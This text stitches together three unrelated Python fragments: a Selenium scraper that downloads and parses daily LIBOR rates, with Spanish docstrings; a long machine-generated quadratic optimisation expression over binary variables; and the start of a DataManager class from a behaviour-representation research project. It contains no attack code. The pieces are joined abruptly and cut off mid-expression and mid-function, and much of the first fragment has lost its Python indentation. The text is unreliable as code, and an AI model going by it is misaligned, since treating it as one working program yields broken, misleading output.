widgets=[progressbar.Bar('=', '[', ']'), '', progressbar.Percentage()])
bar.start()
for single_date in (start_date + timedelta(n)
for n in range(day_count)):
if single_date not in fetched_contents:
in_panel, day_content = self.day_content_in_panel(intermediate_panel_data, single_date)
if not in_panel:
contents[single_date] = self.fetch_day_content(single_date)
else:
logging.warning(f'La fecha {single_date} fue descargada en el primer ciclo.')
cont += 1
bar.update(cont)
bar.finish()
return contents
def empty_fetched_contents(self):
return {}
def day_content_in_panel(self, intermediate_panel_data, single_date):
"""
Recibe la data del panel intermedio y una fecha.
Obtiene la data del panel para ese día.
Parameters
----------
single_date : date
intermediate_panel_data: dict
"""
in_panel, content = False, {}
content = intermediate_panel_data.get(single_date, {})
if content:
in_panel = True
return in_panel, content
    def fetch_day_content(self, single_date):
        """Open the browser at ``self.url`` and return the page HTML for the
        given date.

        The page is requested up to ``self.tries`` times; an empty string is
        returned when every attempt fails.

        Parameters
        ----------
        single_date : date
            Reference date the scraper submits into the page's date field.
        """
        content = ''
        counter = 1
        tries = self.tries
        # Retry until a page source is obtained or attempts run out.
        while counter <= tries and not content:
            try:
                browser_driver = self.get_browser_driver()
                browser_driver.get(self.url)
                element_present = EC.presence_of_element_located(
                    (By.NAME, 'fecha')
                )
                # NOTE(review): a 0-second wait means the 'fecha' field must
                # already be present when checked — confirm this is intended.
                element = WebDriverWait(browser_driver, 0).until(element_present)
                element.send_keys(single_date.strftime("%d/%m/%Y") + Keys.RETURN)
                content = browser_driver.page_source
            except NoSuchElementException:
                # Date field not found on the page: log and retry.
                logging.warning(
                    f'No se encontró la fecha {single_date}. Reintentando...'
                )
                counter = counter + 1
            except (TimeoutException, WebDriverException):
                if counter < tries:
                    # Connectivity problem: log and retry.
                    logging.warning(
                        f'La conexion de internet ha fallado para la fecha {single_date}. Reintentando...'
                    )
                    counter = counter + 1
                else:
                    # Attempts exhausted: give up, returning the (still
                    # empty) content.
                    logging.warning(
                        f'Cantidad máxima de intentos alcanzada para la fecha {single_date}'
                    )
                    return content
        return content
def parse_contents(self, contents, start_date, end_date, intermediate_panel_data):
"""
Retorna un iterable donde cada elemento es un String, o una lista
vacía si no hay contenidos.
Parameters
----------
contents : Iterable
Contenidos que van a ser parseados
"""
parsed_contents = {}
day_count = (end_date - start_date).days + 1
for single_date in (start_date + timedelta(n)
for n in range(day_count)):
in_panel, parsed = self.day_content_in_panel(intermediate_panel_data, single_date)
if in_panel:
parsed_contents[single_date] = parsed
else:
if single_date in contents:
parsed = self.parse_day_content(single_date, contents[single_date])
_parsed = self._preprocess_rows(parsed)
parsed_contents[single_date] = _parsed
intermediate_panel_data[single_date] = _parsed
return parsed_contents, intermediate_panel_data
def parse_day_content(self, single_date, content):
"""
Retorna un iterable con el contenido scrapeado cuyo formato
posee el indice de tiempo y los plazos en días de la tasa
Parameters
----------
content : str
Recibe un string con la información que será parseada
"""
soup = BeautifulSoup(content, "html.parser")
parsed = {'indice_tiempo': single_date, '30': '', '60': '', '90': '', '180': '', '360': ''}
try:
table = soup.find('table')
body = table.find('tbody')
rows = body.find_all('tr')
for row in rows:
validation_list = {}
cols = row.find_all('td')
if cols[0].text in self.rates.keys():
validation_list[cols[0].text] = cols[1].text
for r in validation_list.keys():
valid = self.rates_config_validator(r, self.rates)
if valid:
parsed[cols[0].text] = cols[1].text
else:
continue
return parsed
except:
return parsed
def rates_config_validator(self, parsed, rates):
"""Valida que parsed exista dentro de
los valores de rates en el archivo de
configuración
Parameters
----------
parsed : String
String con la clave correspondiente al plazo en días
rates : Dict
Diccionario que contiene los plazos en días de la tasa Libor
"""
if f'libor_{parsed}_dias' in rates.values():
return True
else:
raise InvalidConfigurationError(
f'La clave libor_{parsed}_dias ' +
'no se encuentra en el archivo de config'
)
def _preprocess_rows(self, parsed):
parsed = self.preprocess_rows(self.rates, parsed)
return parsed
def preprocess_rows(self, rates, rows):
"""
Retorna un iterable con el contenido estandarizado
Parameters
----------
rates : Dict
Diccionario que contiene los plazos en días de la tasa Libor
rows : Iterable
Iterable que contiene la información scrapeada
"""
preprocessed_row = {}
if type(rows['indice_tiempo']) == str:
preprocessed_row['indice_tiempo'] = date.fromisoformat(
rows['indice_tiempo']
)
else:
preprocessed_row['indice_tiempo'] = rows['indice_tiempo']
for rate in rates:
if rate in rows:
if rows[rate]:
preprocessed_row[rates[rate]] = Decimal(
str(rows[rate]).replace(',', '.')
)/100
else:
preprocessed_row[rates[rate]] = None
else:
preprocessed_row[rates[rate]] = rows[rates[rate]]
return preprocessed_row
def preprocess_header(self, rates):
"""
Retorna un iterable con los encabezados estandarizados
Parameters
----------
rates : Dict
Diccionario que contiene los plazos en días de la tasa Libor
"""
preprocessed_header = []
preprocessed_header.append('indice_tiempo')
for value in rates.values():
preprocessed_header.append(value)
return preprocessed_header
def get_intermediate_panel_data_from_parsed(self, parsed):
"""
Recorre parsed y por cada plazo en días genera un diccionario
obteniendo por separado las claves que se utilizaran como headers,
y sus valores.
Parameters
----------
parsed : dict
"""
intermediate_panel_data = self.parsed_to_panel_dataframe(parsed)
return intermediate_panel_data
def parsed_to_panel_dataframe(self, parsed):
"""
Recibe un diccionario, y a partir de sus valores crea el dataframe del panel.
Devuelve una lista de diccionarios con los datos del panel a partir de lo que recibe.
Parameters
----------
parsed: dict
"""
def create_multi_index_column(field_title):
"""Crea multi index desarmando el título de un campo."""
libor, day_type, days = field_title.split("_")
return (day_type, days)
df = pd.DataFrame(parsed.values()).set_index("indice_tiempo")
df = df[['libor_30_dias', 'libor_60_dias', 'libor_90_dias', 'libor_180_dias', 'libor_360_dias']]
df.sort_index(inplace=True)
df.columns = pd.MultiIndex.from_tuples([create_multi_index_column(col) for col in df.columns])
df.columns = df.columns.droplevel(level=1)
df_panel = df.stack([-1], dropna=False).reset_index()
df_panel.columns = ["indice_tiempo", "type", "value"]
df_panel["indice_tiempo"] = df_panel["indice_tiempo"].apply(lambda x: x)
df_panel["value"] = df_panel["value"].apply(lambda x: x if x and x > 0 else None)
panel_data = df_panel.to_dict(orient='records')
return panel_data
def write_intermediate_panel(self, rows, intermediate_panel_path):
"""
Escribe el panel intermedio.
Parameters
----------
rows: Iterable
"""
header = ['indice_tiempo', 'type', 'value']
with open(os.path.join(intermediate_panel_path), 'w') as intermediate_panel:
writer = DictWriter(intermediate_panel, fieldnames=header)
writer.writeheader()
writer.writerows(rows)
def save_intermediate_panel(self, parsed):
"""
Llama a un método para obtener la data del panel intermedio
y a otro método pasandole esa data para que la escriba.
Parameters
----------
parsed: Iterable
"""
intermediate_panel_data = self.get_intermediate_panel_data_from_parsed(
parsed
)
self.write_intermediate_panel(intermediate_panel_data, self.intermediate_panel_path)
def parse_from_intermediate_panel(self):
"""
Lee el dataframe del panel intermedio.
Regresa una lista con un diccionario por cada fecha
Parameters
----------
start_date : date
Fecha de inicio que toma como referencia el scraper
end_date : date
fecha de fin que va a tomar como referencia el scraper
"""
parsed = {}
df_panel = self.read_intermediate_panel_dataframe()
parsed = self.get_parsed(df_panel)
return parsed
def get_parsed(self, df_panel):
"""
Recibe un dataframe a partir del cual genera una tabla pivot.
| |
2*m.b85*m.b396 - 2*m.b85*
m.b398 + 2*m.b85*m.b431 + 2*m.b85*m.b548 + 2*m.b87*m.b324 - 2*m.b87 + 2*m.b87*m.b334 - 2*
m.b334 - 2*m.b87*m.b387 - 2*m.b87*m.b389 + 2*m.b87*m.b478 - 2*m.b478 + 2*m.b87*m.b499 - 2*
m.b88*m.b398 + 2*m.b88 - 2*m.b88*m.b523 + 2*m.b89*m.b284 - 3*m.b89 + 2*m.b89*m.b304 - 2*m.b89*
m.b387 - 2*m.b89*m.b389 + 2*m.b89*m.b391 + 2*m.b89*m.b478 + 2*m.b89*m.b499 - 2*m.b90*m.b384 +
4*m.b90 - 2*m.b90*m.b392 - 2*m.b90*m.b396 + 2*m.b90*m.b439 - 2*m.b439 - 2*m.b90*m.b517 + 4*
m.b517 - 2*m.b90*m.b521 + 4*m.b521 - 2*m.b91*m.b389 + 2*m.b91*m.b499 - 2*m.b92*m.b385 + 4*
m.b92 - 2*m.b92*m.b386 - 2*m.b92*m.b395 - 2*m.b92*m.b397 + 2*m.b92*m.b453 - 4*m.b453 + 2*m.b92
*m.b466 - 2*m.b92*m.b520 - 2*m.b92*m.b522 + 3*m.b522 - 2*m.b93*m.b389 + 2*m.b93 - 2*m.b93*
m.b395 + 2*m.b93*m.b499 - 2*m.b93*m.b520 - 2*m.b96*m.b393 + 2*m.b96 - 2*m.b96*m.b518 + 4*
m.b518 - 2*m.b97*m.b383 + 2*m.b97 - 2*m.b97*m.b398 + 2*m.b97*m.b424 - 4*m.b424 - 2*m.b97*
m.b523 + 2*m.b98*m.b344 + m.b98 + 2*m.b98*m.b354 - 3*m.b354 - 2*m.b98*m.b391 - 2*m.b98*m.b397
- 2*m.b98*m.b522 - 2*m.b99*m.b387 + 4*m.b99 - 2*m.b99*m.b392 - 2*m.b99*m.b393 + 2*m.b99*
m.b478 - 2*m.b99*m.b517 - 2*m.b99*m.b518 + 2*m.b100*m.b284 + 2*m.b100*m.b304 + 2*m.b100*m.b344
+ 2*m.b100*m.b354 - 2*m.b100*m.b392 - 2*m.b100*m.b396 - 2*m.b100*m.b517 - 2*m.b100*m.b521 + 2
*m.b101*m.b363 - 2*m.b101 + 2*m.b101*m.b373 - 2*m.b101*m.b382 - 2*m.b101*m.b383 - 2*m.b101*
m.b385 + 2*m.b101*m.b408 - 2*m.b408 + 2*m.b101*m.b424 + 2*m.b101*m.b453 - 2*m.b102*m.b388 +
m.b102 + 2*m.b102*m.b391 - 2*m.b102*m.b397 + 2*m.b102*m.b489 - 2*m.b489 - 2*m.b102*m.b522 + 2*
m.b103*m.b324 - 2*m.b103 + 2*m.b103*m.b334 + 2*m.b103*m.b363 + 2*m.b103*m.b373 - 2*m.b103*
m.b384 - 2*m.b103*m.b385 - 2*m.b103*m.b393 + 2*m.b103*m.b439 + 2*m.b103*m.b453 - 2*m.b103*
m.b518 - 2*m.b104*m.b383 + 4*m.b104 - 2*m.b104*m.b396 - 2*m.b104*m.b398 + 2*m.b104*m.b424 - 2*
m.b104*m.b521 - 2*m.b104*m.b523 - 2*m.b106*m.b341 + 3*m.b106 - 2*m.b106*m.b485 - 2*m.b106*
m.b506 + 2*m.b107*m.b277 - 2*m.b107 + 2*m.b107*m.b296 + 2*m.b107*m.b300 - 2*m.b107*m.b324 - 2*
m.b107*m.b330 - m.b330 - 2*m.b107*m.b332 - m.b332 + 2*m.b107*m.b387 + 2*m.b107*m.b389 - 2*
m.b108*m.b327 + 5*m.b108 + m.b327 - 2*m.b108*m.b335 - 2*m.b108*m.b339 + 2*m.b339 + 2*m.b108*
m.b435 - 4*m.b435 + 2*m.b108*m.b437 - 4*m.b437 - 2*m.b108*m.b479 + 6*m.b479 - 2*m.b108*m.b483
+ 7*m.b483 - 2*m.b108*m.b500 + 8*m.b500 - 2*m.b108*m.b504 + 8*m.b504 - 2*m.b109*m.b332 + 2*
m.b109 - 2*m.b109*m.b476 - 2*m.b110*m.b328 + 4*m.b110 + m.b328 - 2*m.b110*m.b329 - 2*m.b110*
m.b338 - 2*m.b110*m.b340 + 2*m.b110*m.b449 - 7*m.b449 + 2*m.b110*m.b451 - 10*m.b451 + 2*m.b110
*m.b462 - m.b462 + 2*m.b110*m.b464 - 2*m.b464 - 2*m.b110*m.b482 - 2*m.b110*m.b484 + 5*m.b484
- 2*m.b110*m.b503 - 2*m.b110*m.b505 + 10*m.b505 - 2*m.b111*m.b332 + 5*m.b111 - 2*m.b111*
m.b338 - 2*m.b111*m.b476 - 2*m.b111*m.b482 - 2*m.b111*m.b503 - 2*m.b114*m.b336 + 3*m.b114 +
m.b336 - 2*m.b114*m.b480 + 6*m.b480 - 2*m.b114*m.b501 + 12*m.b501 - 2*m.b115*m.b326 + 2*m.b115
+ 2*m.b326 - 2*m.b115*m.b341 + 2*m.b115*m.b420 - 7*m.b420 + 2*m.b115*m.b422 - 12*m.b422 - 2*
m.b115*m.b485 - 2*m.b115*m.b506 - 2*m.b116*m.b322 + 5*m.b116 - 2*m.b116*m.b334 - 2*m.b116*
m.b340 + 2*m.b116*m.b350 - 4*m.b350 + 2*m.b116*m.b352 - 8*m.b352 - 2*m.b116*m.b478 - 2*m.b116*
m.b484 - 2*m.b116*m.b499 - 2*m.b116*m.b505 - 2*m.b117*m.b330 + 6*m.b117 - 2*m.b117*m.b335 - 2*
m.b117*m.b336 + 2*m.b117*m.b476 - 2*m.b117*m.b479 - 2*m.b117*m.b480 - 2*m.b117*m.b500 - 2*
m.b117*m.b501 + 2*m.b118*m.b277 + 2*m.b118 + 2*m.b118*m.b296 + 2*m.b118*m.b300 - 2*m.b118*
m.b322 - 2*m.b118*m.b335 - 2*m.b118*m.b339 + 2*m.b118*m.b350 + 2*m.b118*m.b352 - 2*m.b118*
m.b479 - 2*m.b118*m.b483 - 2*m.b118*m.b500 - 2*m.b118*m.b504 - 2*m.b119*m.b323 - 4*m.b119 - 2*
m.b119*m.b325 - 2*m.b119*m.b326 - 2*m.b119*m.b328 + 2*m.b119*m.b369 + 2*m.b119*m.b371 + 2*
m.b119*m.b404 - 3*m.b404 + 2*m.b119*m.b406 - 4*m.b406 + 2*m.b119*m.b420 + 2*m.b119*m.b422 + 2*
m.b119*m.b449 + 2*m.b119*m.b451 - 2*m.b120*m.b324 + 3*m.b120 - 2*m.b120*m.b331 - 2*m.b120*
m.b340 + 2*m.b120*m.b387 + 2*m.b120*m.b389 - 2*m.b120*m.b475 + 3*m.b475 - 2*m.b120*m.b484 + 2*
m.b120*m.b487 - 4*m.b487 - 2*m.b120*m.b505 - 2*m.b121*m.b323 - 2*m.b121 - 2*m.b121*m.b327 - 2*
m.b121*m.b328 + 2*m.b121*m.b330 + 2*m.b121*m.b332 - 2*m.b121*m.b336 + 2*m.b121*m.b369 + 2*
m.b121*m.b371 + 2*m.b121*m.b435 + 2*m.b121*m.b437 + 2*m.b121*m.b449 + 2*m.b121*m.b451 - 2*
m.b121*m.b480 - 2*m.b121*m.b501 - 2*m.b122*m.b326 + 5*m.b122 - 2*m.b122*m.b339 - 2*m.b122*
m.b341 + 2*m.b122*m.b420 + 2*m.b122*m.b422 - 2*m.b122*m.b483 - 2*m.b122*m.b485 - 2*m.b122*
m.b504 - 2*m.b122*m.b506 + 2*m.b124*m.b318 - 4*m.b124 + 2*m.b124*m.b398 + 2*m.b124*m.b485 + 2*
m.b124*m.b506 + 2*m.b125*m.b446 - 3*m.b125 + 2*m.b125*m.b530 + 2*m.b125*m.b548 + 2*m.b126*
m.b506 - m.b126 + 2*m.b127*m.b460 - 4*m.b127 + 2*m.b127*m.b473 + 2*m.b127*m.b545 + 2*m.b127*
m.b550 + 2*m.b128*m.b506 - 2*m.b128 + 2*m.b128*m.b545 + 2*m.b131*m.b536 - m.b131 + 2*m.b132*
m.b431 - m.b132 + 2*m.b133*m.b361 - 3*m.b133 + 2*m.b133*m.b523 + 2*m.b133*m.b550 + 2*m.b134*
m.b485 - 3*m.b134 + 2*m.b134*m.b530 + 2*m.b134*m.b536 + 2*m.b135*m.b318 - 4*m.b135 + 2*m.b135*
m.b361 + 2*m.b135*m.b530 + 2*m.b135*m.b548 + 2*m.b136*m.b380 - 4*m.b136 + 2*m.b136*m.b415 + 2*
m.b136*m.b431 + 2*m.b136*m.b460 + 2*m.b137*m.b398 - 3*m.b137 + 2*m.b137*m.b496 + 2*m.b137*
m.b550 + 2*m.b138*m.b341 - 5*m.b138 + 2*m.b138*m.b380 + 2*m.b138*m.b446 + 2*m.b138*m.b460 + 2*
m.b138*m.b536 + 2*m.b139*m.b431 - 2*m.b139 + 2*m.b139*m.b548 - 2*m.b141*m.b290 + 8*m.b141 - 2*
m.b141*m.b306 - 2*m.b141*m.b314 - 2*m.b141*m.b384 - 2*m.b141*m.b392 - 2*m.b141*m.b396 + 2*
m.b141*m.b435 + 2*m.b141*m.b437 - 2*m.b141*m.b479 - 2*m.b141*m.b483 - 2*m.b141*m.b500 - 2*
m.b141*m.b504 - 2*m.b142*m.b300 + 3*m.b142 - 2*m.b142*m.b389 - 2*m.b142*m.b476 - 2*m.b143*
m.b292 + 8*m.b143 - 2*m.b143*m.b294 - 2*m.b143*m.b312 - 2*m.b143*m.b316 - 2*m.b143*m.b385 - 2*
m.b143*m.b386 - 2*m.b143*m.b395 - 2*m.b143*m.b397 + 2*m.b143*m.b449 + 2*m.b143*m.b451 + 2*
m.b143*m.b462 + 2*m.b143*m.b464 - 2*m.b143*m.b482 - 2*m.b143*m.b484 - 2*m.b143*m.b503 - 2*
m.b143*m.b505 - 2*m.b144*m.b300 + 7*m.b144 - 2*m.b144*m.b312 - 2*m.b144*m.b389 - 2*m.b144*
m.b395 - 2*m.b144*m.b476 - 2*m.b144*m.b482 - 2*m.b144*m.b503 - 2*m.b147*m.b308 + 4*m.b147 - 2*
m.b147*m.b393 - 2*m.b147*m.b480 - 2*m.b147*m.b501 - 2*m.b148*m.b288 + 4*m.b148 - 2*m.b148*
m.b318 - 2*m.b148*m.b383 - 2*m.b148*m.b398 + 2*m.b148*m.b420 + 2*m.b148*m.b422 - 2*m.b148*
m.b485 - 2*m.b148*m.b506 - 2*m.b149*m.b280 + 6*m.b149 - 2*m.b149*m.b304 - 2*m.b149*m.b316 + 2*
m.b149*m.b344 + 2*m.b149*m.b350 + 2*m.b149*m.b352 - 2*m.b149*m.b391 - 2*m.b149*m.b397 - 2*
m.b149*m.b478 - 2*m.b149*m.b484 - 2*m.b149*m.b499 - 2*m.b149*m.b505 - 2*m.b150*m.b296 + 9*
m.b150 - 2*m.b150*m.b306 - 2*m.b150*m.b308 - 2*m.b150*m.b387 - 2*m.b150*m.b392 - 2*m.b150*
m.b393 + 2*m.b150*m.b476 - 2*m.b150*m.b479 - 2*m.b150*m.b480 - 2*m.b150*m.b500 - 2*m.b150*
m.b501 - 2*m.b151*m.b280 + 3*m.b151 + 2*m.b151*m.b284 + 2*m.b151*m.b296 + 2*m.b151*m.b300 - 2*
m.b151*m.b306 - 2*m.b151*m.b314 + 2*m.b151*m.b344 + 2*m.b151*m.b350 + 2*m.b151*m.b352 - 2*
m.b151*m.b392 - 2*m.b151*m.b396 - 2*m.b151*m.b479 - 2*m.b151*m.b483 - 2*m.b151*m.b500 - 2*
m.b151*m.b504 - 2*m.b152*m.b282 - 2*m.b152 - 2*m.b152*m.b286 - 2*m.b152*m.b288 - 2*m.b152*
m.b292 + 2*m.b152*m.b363 + 2*m.b152*m.b369 + 2*m.b152*m.b371 - 2*m.b152*m.b382 - 2*m.b152*
m.b383 - 2*m.b152*m.b385 + 2*m.b152*m.b404 + 2*m.b152*m.b406 + 2*m.b152*m.b420 + 2*m.b152*
m.b422 + 2*m.b152*m.b449 + 2*m.b152*m.b451 - 2*m.b153*m.b284 + 5*m.b153 - 2*m.b153*m.b298 - 2*
m.b153*m.b316 + 2*m.b153*m.b387 - 2*m.b153*m.b388 + 2*m.b153*m.b389 - 2*m.b153*m.b397 - 2*
m.b153*m.b475 - 2*m.b153*m.b484 + 2*m.b153*m.b487 - 2*m.b153*m.b505 - 2*m.b154*m.b277 - 2*
m.b154*m.b282 - 2*m.b154*m.b290 - 2*m.b154*m.b292 - 2*m.b154*m.b308 + 2*m.b154*m.b324 + 2*
m.b154*m.b330 + 2*m.b154*m.b332 + 2*m.b154*m.b363 + 2*m.b154*m.b369 + 2*m.b154*m.b371 - 2*
m.b154*m.b384 - 2*m.b154*m.b385 - 2*m.b154*m.b393 + 2*m.b154*m.b435 + 2*m.b154*m.b437 + 2*
m.b154*m.b449 + 2*m.b154*m.b451 - 2*m.b154*m.b480 - 2*m.b154*m.b501 - 2*m.b155*m.b288 + 8*
m.b155 - 2*m.b155*m.b314 - 2*m.b155*m.b318 - 2*m.b155*m.b383 - 2*m.b155*m.b396 - 2*m.b155*
m.b398 + 2*m.b155*m.b420 + 2*m.b155*m.b422 - 2*m.b155*m.b483 - 2*m.b155*m.b485 - 2*m.b155*
m.b504 - 2*m.b155*m.b506 - 2*m.b157*m.b437 - m.b157 + 2*m.b157*m.b500 + 2*m.b157*m.b504 - 2*
m.b158*m.b433 + 2*m.b158 + m.b433 - 2*m.b158*m.b434 - 2*m.b158*m.b443 - 2*m.b158*m.b445 + 2*
m.b158*m.b454 - 5*m.b454 + 2*m.b158*m.b458 - m.b458 + 2*m.b158*m.b467 + m.b467 + 2*m.b158*
m.b471 + m.b471 - 2*m.b158*m.b527 - 2*m.b158*m.b529 + m.b529 + 2*m.b158*m.b543 - 2*m.b158*
m.b547 - m.b547 - 2*m.b159*m.b437 - 2*m.b159*m.b443 + 2*m.b159*m.b500 + 2*m.b159*m.b504 - 2*
m.b159*m.b527 + 2*m.b159*m.b543 - 2*m.b162*m.b441 + m.b162 + m.b441 - 2*m.b162*m.b525 + 2*
m.b525 + 2*m.b162*m.b534 + m.b534 + 2*m.b163*m.b417 - 2*m.b417 + 2*m.b163*m.b425 - 5*m.b425 +
2*m.b163*m.b429 - 2*m.b429 - 2*m.b163*m.b446 - 2*m.b163*m.b530 - 2*m.b163*m.b548 + 2*m.b164*
m.b347 - m.b164 + 2*m.b164*m.b355 - m.b355 + 2*m.b164*m.b359 + m.b359 - 2*m.b164*m.b439 - 2*
m.b164*m.b445 + 2*m.b164*m.b517 + 2*m.b164*m.b521 - 2*m.b164*m.b529 - 2*m.b164*m.b547 - 2*
m.b165*m.b435 - 2*m.b165*m.b440 - m.b440 - 2*m.b165*m.b441 + 2*m.b165*m.b479 + 2*m.b165*m.b483
- 2*m.b165*m.b525 + 2*m.b165*m.b528 + 3*m.b528 + 2*m.b165*m.b534 + 2*m.b166*m.b290 - 4*m.b166
+ 2*m.b166*m.b306 + 2*m.b166*m.b314 + 2*m.b166*m.b347 + 2*m.b166*m.b355 + 2*m.b166*m.b359 - 2
*m.b166*m.b440 - 2*m.b166*m.b444 + m.b444 + 2*m.b167*m.b366 - 10*m.b167 + 2*m.b167*m.b374 + 2*
m.b167*m.b378 + 2*m.b167*m.b401 + 2*m.b167*m.b409 - 3*m.b409 + 2*m.b167*m.b413 - m.b413 + 2*
m.b167*m.b417 + 2*m.b167*m.b425 + 2*m.b167*m.b429 - 2*m.b167*m.b433 + 2*m.b167*m.b454 + 2*
m.b167*m.b458 + 2*m.b168*m.b384 | |
<gh_stars>1-10
"""
Author: Anonymous
Description:
Data management class
Some important components:
- Attributes:
- original data (parameter & collision info), labels,
embedded and reconstructed data
- cluster assignments and cluster mean and std
- (TODO) trajectories (state & action)
- Methods:
- update_clusters: performs clustering in the latent space
- update_representations: updates embedding and
reconstructed data
- generate_data: calls the datagen object method to get a new
population and add it
- generate_batch: samples batches from the stored data
- plot_spaces: data visualisation
"""
import os
import csv
import logging
import pickle
import numpy as np
from functools import partial
from itertools import product, combinations
from operator import itemgetter
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
import behaviour_representations.exploration.manage_datagen as mdgen
import behaviour_representations.clustering.manage_cluster as mclstr
import behaviour_representations.training.batching as mbatch
from behaviour_representations.utils.utils import (timing,
info_outcome,
pad_traj,
uniquify_by_key)
from behaviour_representations.utils.utils import _TAB, _SEED
from behaviour_representations.utils.utils import transform_PCA_TSNE
logger = logging.getLogger(__name__)
class DataManager(object):
"""
Class that manages data storage, generation and batching.
"""
def __init__(self, load_dataset_path, load_model_path,
             dimred_mode, filter_mbd=True,
             **taskargs_dict):
    """
    Set up the data manager: sub-managers (data generation, clustering,
    batching), empty data containers, dimensionality bookkeeping and the
    CSV file used to log data-discovery progress.

    Args:
        load_dataset_path: directory of a previously saved dataset, or None.
        load_model_path: directory of a previously saved model, or None.
        dimred_mode: dimensionality-reduction technique(s) used for
            visualisation; a single value or a list.
        filter_mbd: stored as self._uniquify_metric (filtering of
            behaviour-descriptor duplicates).
        **taskargs_dict: full task configuration; must contain
            'experiment_directory' and 'experiment' entries.
    """
    self.dirname = taskargs_dict['experiment_directory']
    self.load_dataset_path = load_dataset_path
    self.load_model_path = load_model_path
    self.ds_rate = 20  # fixed down-sampling rate
    # Managers
    self.datagen_object = mdgen.DataGenManager(**taskargs_dict)
    self.skip_clust = False
    self.cluster_object = mclstr.ClusterManager(**taskargs_dict)
    self.batch_object = mbatch.BatchManager(**taskargs_dict)
    # Initialise data containers
    self._init_data()
    # Metrics containers
    self._uniquify_metric = filter_mbd
    # Dimensionalities (taken from the data generator)
    self.num_outcomes = self.datagen_object.num_outcomes
    self.inputdim_param_ae = self.datagen_object.parameter_dims
    self.inputdim_traj_ae = self.datagen_object.traj_dim
    self.traj_len = self.inputdim_traj_ae[0]
    # Training
    self.training_loss_dict = {}
    # Initialise statistics
    self.standard_save = True
    # Dimensionality reduction technique for visualisation
    self.dimred = dimred_mode if isinstance(dimred_mode, list) \
                              else [dimred_mode]
    # Normalise-data-before-embedding flag, chosen from experiment type
    if taskargs_dict['experiment']['type'] == 'displacement':
        self._normalise_flag = 'gaussian'
    elif taskargs_dict['experiment']['type'] == 'nn_policy' \
            and self.datagen_object.stype is not None:
        self._normalise_flag = 'scaled'
    else:
        self._normalise_flag = False
    logger.info("DATASET PRE-PROCESSING: scaling: '{}'; range: {}".format(
        self.datagen_object.stype, self.datagen_object.srange))
    # Initialise data discovery writer csv if new experiment
    if not os.path.isdir(self.dirname):
        os.makedirs(self.dirname)
    filepath = '{}/ref_data_{}_{}.csv'.format(
        self.dirname,
        self.datagen_object.ctrl_name,
        self.datagen_object.exploration_normal)
    if not os.path.isfile(filepath):
        # BUGFIX: csv files must be opened with newline='' so the csv
        # module does not emit blank rows on Windows.
        with open(filepath, 'a', newline='') as outfile:
            writer = csv.DictWriter(
                outfile,
                fieldnames=["nloop", "niter", "nsmp", "nstep", "coverage",
                            "fitness", "outcomes", "ratios"])
            writer.writeheader()
""" MANAGE DATASET """
def _init_data(self):
# Parameter containers
self.outcomes = None # [n_samples, 1]
self.param_original = None # [n_samples, parameters_dim]
self.param_embedded = None # [n_samples, latentdim_param_ae]
self.param_reconstructed = None # [n_samples, parameters_dim]
self.recn_error = None
self.new_data = None
self.param_stats = {}
self.latent_stats = {}
# Trajectory
self.traj_original = None
self.traj_embedded = None
self.traj_reconstructed = None
self.traj_data = {}
self.traj_data['main'] = None # [n_samples, traj_len, traj_dim]
self.traj_data['aux'] = None # [n_samples, traj_len, traj_dim]
# self.traj_main = None # [n_samples, traj_len, traj_dim]
# self.traj_aux = None # [n_samples, traj_len, traj_dim]
# Metrics containers
self.metric_bd = None
self.metric_traj_dtw = None # [n_samples, n_samples]
self.metric_traj_dtw_norm = None
# Initialise statistics
self.num_datapoints = 0
self.classes_per_loop = []
def _add_data(self, new_data_dict, embedding_fn=None,
              **kwargs):
    """Append a batch of newly generated samples to the dataset.

    Args:
        new_data_dict: dict with parallel per-sample entries
            'param_original', 'outcomes', 'traj_main', 'traj_aux' and
            'metric_bd', or None when no new unique points were produced.
        embedding_fn: optional callable; when given, latent and
            reconstruction representations are refreshed after adding.
        **kwargs: forwarded to _update_info / update_representations.

    Side effects: grows all data containers, logs dataset statistics,
    records per-class counts in self.classes_per_loop and, when
    self.standard_save is set, pickles the dataset to disk.
    """
    # Add generated data
    if new_data_dict is not None:
        if self.param_original is None:
            # First batch: containers are initialised directly.
            self.param_original = new_data_dict['param_original']
            self.outcomes = new_data_dict['outcomes']
            self.traj_data['main'] = new_data_dict['traj_main']
            self.traj_data['aux'] = new_data_dict['traj_aux']
            # make a padded version of trajectories (max 1000 steps)
            self.traj_original = pad_traj(new_data_dict['traj_main'],
                                          max_len=self.traj_len)
            self.metric_bd = new_data_dict['metric_bd']
        else:
            # Subsequent batches: stack onto the existing containers.
            self.param_original = np.vstack([self.param_original,
                                     new_data_dict['param_original']])
            self.outcomes = np.vstack([self.outcomes,
                                       new_data_dict['outcomes']])
            # self.outcomes = np.append(self.outcomes, new_data_dict['outcomes'])
            self.traj_data['main'].extend(new_data_dict['traj_main'])
            self.traj_data['aux'].extend(new_data_dict['traj_aux'])
            # make a padded version of trajectories (max 1000 steps)
            self.traj_original = np.vstack([self.traj_original,
                                    pad_traj(new_data_dict['traj_main'],
                                             max_len=self.traj_len)])
            self.metric_bd = np.vstack([self.metric_bd,
                                        new_data_dict['metric_bd']])
        # Log new data
        logger.info("DATASET: ({} + {}): {}\n".format(
            self.num_datapoints, len(new_data_dict['outcomes']) \
                                 if new_data_dict is not None else 0,
            info_outcome(self.outcomes)))
        # Update the data manager info
        self._update_info(**kwargs)
        # Update embedding and reconstruction data
        if embedding_fn is not None :
            self.update_representations(embedding_fn=embedding_fn,**kwargs)
    else:
        logger.info("DATASET ({}): No new unique points! {}\n".format(
            self.num_datapoints, info_outcome(self.outcomes)))
    # Log added data
    # Save class label progress; classes 0 and -1 always reported
    class_sz = {0:0, -1:0}
    class_sz.update({cc:np.count_nonzero(self.outcomes[:,0]==cc) \
                     for cc in np.unique(self.outcomes[:,0])})
    self.classes_per_loop.append(class_sz)
    if self.standard_save: self.save_dataset()
def _update_info(self, loaded=False, **kwargs):
""" Update statistics and remove duplicate parameters """
# Update data sizes
self.unique_classes = np.unique(self.outcomes[:,0])
self.num_datapoints = len(self.outcomes)
# self.num_outcomes = len(self.unique_classes)
# Update dataset statistics
all_param = self.param_original.reshape(self.num_datapoints, -1)
all_param = all_param[:, np.invert(np.isinf(all_param[0,:]))]
self.param_stats['mu'] = np.mean(all_param, axis=0)
self.param_stats['std'] = np.std(all_param, axis=0)
self.param_stats['cov'] = np.cov(all_param, rowvar=False)
# self.param_stats['mu'] = np.zeros(self.param_original.shape[1:])
# self.param_stats['std'] = np.ones(self.param_original.shape[1:])
# self.param_stats['cov'] = np.eye(np.prod(
